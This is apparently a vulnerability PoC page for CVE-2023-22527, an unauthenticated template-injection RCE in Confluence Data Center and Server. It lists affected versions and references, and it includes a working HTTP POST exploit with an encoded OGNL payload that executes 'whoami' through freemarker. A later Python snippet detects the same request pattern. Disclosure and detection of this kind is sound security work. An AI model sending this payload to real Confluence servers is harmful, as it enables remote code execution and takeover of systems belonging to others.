PoC details: 6ad9dfa5fad2fb953b8eabc6528bd56c71359414

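Source
Associated vulnerability
Title: Atlassian Confluence security vulnerability (CVE-2023-22527)
Description: Atlassian Confluence is a professional enterprise knowledge management and collaboration software suite from the Australian company Atlassian, and can also be used to build enterprise wikis. Atlassian Confluence Data Center and Server contain a security vulnerability caused by a template injection flaw that allows an unauthenticated attacker to achieve remote code execution on an affected instance.
Description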
A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center. 
Introduction
# [CVE-2023-22527](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22527)

![](https://img.shields.io/static/v1?label=Product&message=Confluence%20Data%20Center&color=blue)
![](https://img.shields.io/static/v1?label=Product&message=Confluence%20Server&color=blue)
![](https://img.shields.io/static/v1?label=Version&message=n%2Fa&color=blue)
![](<https://img.shields.io/static/v1?label=Vulnerability&message=RCE%20(Remote%20Code%20Execution)&color=brighgreen>)

## Description

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

| Product                           | Affected Versions                                        |
| :-------------------------------- | :------------------------------------------------------- |
| Confluence Data Center and Server | 8.0.x <br />8.2.x<br />8.3.x<br />8.4.x<br />8.5.0-8.5.3 |

## POC
```
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

```
![image](https://github.com/Manh130902/CVE-2023-22527-POC/assets/93723285/897e60ea-e648-4e07-ba32-4f7dd24fe6b4)
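
A defender-side check for the request shape shown above, as an added example that is not part of the original README: it decodes a form body the way the PoC encodes it (URL encoding plus literal `\u0027` escapes) and reports the OGNL markers visible in that request. The function names, the generalised `/template/…/*.vm` path pattern and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# The page shows /template/aui/text-inline.vm; matching any .vm file under
# /template/ is a generalisation made for this example (assumption).
TEMPLATE_PATH = re.compile(r"^/template/.+\.vm(?:$|[?;])", re.IGNORECASE)

# OGNL markers taken from the request on this page, in decoded form.
OGNL_MARKERS = (
    ".KEY_velocity.struts2.context",
    "#request",
    "#parameters",
    "internalGet('ognl')",
    "findValue(",
    "freemarker.template.utility.Execute",
    "@org.apache.struts2.ServletActionContext@",
)

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalise(body: str) -> str:
    """URL-decode the body, then resolve literal \\uXXXX escapes (e.g. \\u0027)."""
    decoded = unquote_plus(body)
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)


def inspect_request(method: str, path: str, body: str) -> list[str]:
    """Return the reasons a request resembles the CVE-2023-22527 pattern."""
    findings = []
    if method.upper() == "POST" and TEMPLATE_PATH.search(path):
        findings.append("POST to Velocity template path")
    hits = [m for m in OGNL_MARKERS if m in normalise(body)]
    if hits:
        findings.append("OGNL markers: " + ", ".join(hits))
    return findings


# Constructed samples: a truncated fragment of the body above, and a benign form.
SUSPICIOUS_BODY = ("label=aaa%5Cu0027%2B%23request.get%28%5Cu0027"
                   ".KEY_velocity.struts2.context%5Cu0027%29"
                   ".internalGet%28%5Cu0027ognl%5Cu0027%29")
BENIGN_BODY = "title=Quarterly+report&label=finance"
```

Matching on the raw body would miss `#request` and `internalGet('ognl')`, which only appear after both decoding steps; run the check on the normalised text at a reverse proxy, WAF or over captured request logs.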

## Reference

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

https://nvd.nist.gov/vuln/detail/CVE-2023-22527
File snapshot

```
[4.0K] /data/pocs/6ad9dfa5fad2fb953b8eabc6528bd56c71359414
├── [2.9K] CVE-2023-22527.py
├── [1.7K] CVE-2023-22527.yaml
└── [2.2K] README.md

0 directories, 3 files
```